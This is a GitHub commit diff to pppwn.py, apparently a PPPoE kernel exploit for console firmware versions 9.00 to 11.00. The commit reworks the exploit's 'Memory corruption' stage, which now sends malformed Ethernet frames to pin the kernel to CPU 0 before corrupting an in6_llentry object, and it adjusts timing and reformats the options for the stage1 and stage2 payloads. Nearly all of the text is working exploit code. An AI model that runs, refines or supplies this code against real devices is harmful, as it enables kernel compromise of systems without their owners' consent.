Trigger a different printf.

TheOfficialFloW · May 3, 2024 · 1252d98 · 1252d98
1 parent b9f2a3e
commit 1252d98
Showing 1 changed file with 12 additions and 9 deletions.
diff --git a/pppwn.py b/pppwn.py
@@ -655,9 +655,9 @@ def run(self):
         print('')
         print('[+] STAGE 1: Memory corruption')
 
-        # Use an invalid proto enum to trigger a printf in the kernel. For
-        # some reason, this causes scheduling on CPU 0 at some point, which
-        # makes the next allocation use the same per-CPU cache.
+        # Send invalid packet to trigger a printf in the kernel. For some
+        # reason, this causes scheduling on CPU 0 at some point, which makes
+        # the next allocation use the same per-CPU cache.
         for i in range(self.PIN_NUM):
             if i % 0x100 == 0:
                 print('[*] Pinning to CPU 0...{}%'.format(100 * i //
@@ -668,15 +668,13 @@ def run(self):
             self.s.send(
                 Ether(src=self.source_mac,
                       dst=self.target_mac,
-                      type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
-                PPP(proto=0x4141))
-            self.s.recv()
-            sleep(0.0005)
+                      type=ETHERTYPE_PPPOE))
+            sleep(0.001)
 
         print('[+] Pinning to CPU 0...done')
 
         # LCP fails sometimes without the wait
-        sleep(0.5)
+        sleep(1)
 
         # Corrupt in6_llentry object
         overflow_lle = self.build_overflow_lle()
@@ -820,7 +818,12 @@ def run(self):
 def main():
     parser = ArgumentParser('pppwn.py')
     parser.add_argument('--interface', required=True)
-    parser.add_argument('--fw', choices=['900', '903', '904', '950', '960', '1000', '1001', '1050','1070','1071', '1100'], default='1100')
+    parser.add_argument('--fw',
+                        choices=[
+                            '900', '903', '904', '950', '960', '1000', '1001',
+                            '1050', '1070', '1071', '1100'
+                        ],
+                        default='1100')
     parser.add_argument('--stage1', default='stage1/stage1.bin')
     parser.add_argument('--stage2', default='stage2/stage2.bin')
     args = parser.parse_args()